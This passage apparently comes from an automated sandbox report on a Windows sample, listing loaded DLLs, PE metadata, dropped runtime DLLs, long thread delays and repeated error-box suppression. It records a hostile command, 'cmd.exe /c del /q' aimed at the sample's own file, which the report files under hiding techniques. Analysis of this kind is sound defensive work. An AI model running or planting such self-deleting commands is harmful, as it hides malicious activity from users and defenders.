Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: msisip.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: wshext.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: mi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: miutils.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: LisectAVT_2403002B_185.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: LisectAVT_2403002B_185.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: LisectAVT_2403002B_185.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: LisectAVT_2403002B_185.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: LisectAVT_2403002B_185.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: LisectAVT_2403002B_185.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: LisectAVT_2403002B_185.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: LisectAVT_2403002B_185.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: G:\Jenkins_MusicBoxWorkPrjCode\MusicBox_PUBLIC_RELESE_20-10-09_9.1.1.3\code\KwResource\bin\Release\pdb\KwTools.pdb source: LisectAVT_2403002B_185.exe
Source: Binary string: msvcr120.i386.pdb source: msvcr120[1].dll.0.dr, msvcr120.dll.0.dr
Source: Binary string: msvcp120.i386.pdb source: msvcp120.dll.0.dr, msvcp120[1].dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: LisectAVT_2403002B_185.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: LisectAVT_2403002B_185.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: LisectAVT_2403002B_185.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: LisectAVT_2403002B_185.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: LisectAVT_2403002B_185.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: msvcp140[1].dll.0.drStatic PE information: 0x771734A7 [Mon Apr 25 02:38:31 2033 UTC]
Source: msvcp120.dll.0.drStatic PE information: real checksum: 0x7cb35 should be: 0x6aef4
Source: zf_cef[1].dll.0.drStatic PE information: real checksum: 0x0 should be: 0x43f10
Source: LisectAVT_2403002B_185.exeStatic PE information: real checksum: 0x0 should be: 0x55553
Source: msvcp120[1].dll.0.drStatic PE information: real checksum: 0x7cb35 should be: 0x6aef4
Source: zf_cef.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x43f10
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_05A9A660 pushad ; ret 0_3_05A9A693
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_034C0439 push ebx; ret 0_3_034C0447
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_034C1A79 pushad ; ret 0_3_034C1A83
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_034C3A04 push FFFFFFBEh; iretd 0_3_034C3A06
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_034C1A3C push ds; ret 0_3_034C1A67
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_034C1AEF push esi; ret 0_3_034C1AF8
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_034C185F push es; iretd 0_3_034C1868
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_0047A264 push ecx; ret 0_2_0047A277
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_0359078D push edi; retf 0_2_0359079A
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_03591062 push esp; ret 0_2_03591079
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_0359109A push esp; ret 0_2_03591079
Source: msvcr120[1].dll.0.drStatic PE information: section name: .text entropy: 6.95576372950548
Source: msvcr120.dll.0.drStatic PE information: section name: .text entropy: 6.95576372950548
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\vcruntime140[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\msvcr120[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\msvcp140[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Program Files (x86)\Everything\msvcp120.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\msvcp120[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Program Files (x86)\Everything\vcruntime140.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\zf_cef[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Program Files (x86)\Everything\msvcr120.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Program Files (x86)\Everything\zf_cef.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Program Files (x86)\Everything\msvcp140.dllJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess created: "C:\Windows\System32\cmd.exe" /c del /q C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess created: "C:\Windows\System32\cmd.exe" /c del /q C:\Users\user\Desktop\LisectAVT_2403002B_185.exeJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeMemory allocated: 3590000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeMemory allocated: 3820000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeMemory allocated: 35C0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeWindow / User API: threadDelayed 3010Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeWindow / User API: threadDelayed 6804Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\vcruntime140[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\msvcr120[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\msvcp140[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeDropped PE file which has not been started: C:\Program Files (x86)\Everything\msvcp120.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\msvcp120[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeDropped PE file which has not been started: C:\Program Files (x86)\Everything\vcruntime140.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\zf_cef[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeDropped PE file which has not been started: C:\Program Files (x86)\Everything\msvcr120.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeDropped PE file which has not been started: C:\Program Files (x86)\Everything\zf_cef.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeDropped PE file which has not been started: C:\Program Files (x86)\Everything\msvcp140.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe TID: 7904Thread sleep time: -12912720851596678s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_0048EBE2 FindFirstFileExW,0_2_0048EBE2
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeThread delayed: delay time: 922337203685477Jump to behavior
